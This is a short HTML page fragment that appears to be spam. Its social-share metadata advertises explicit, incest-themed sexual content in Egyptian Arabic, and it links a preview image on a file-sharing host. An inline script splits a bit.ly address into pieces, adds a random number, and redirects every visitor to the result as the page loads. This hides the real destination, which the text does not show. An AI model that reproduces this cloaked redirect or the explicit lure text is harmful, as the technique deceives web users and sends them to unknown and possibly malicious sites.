<meta property="og:title" content="كــــس محـــــارم">

<meta property="og:description" content="
                                         
                                

فى شقه مفروشه جايب مصلحه تمام ينيكها ورا وقدام باوضاع نار وموحن وشرمطه ولبونه واحلا كلام جديد لا يفوتك

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://dc577.4shared.com/img/l46-DZ8Piq/s24/170afc8eaa8

 "> 

<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pree";
c = location.href = "edjv";
d = Math.ceil(Math.random() * 12);
a = "http://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
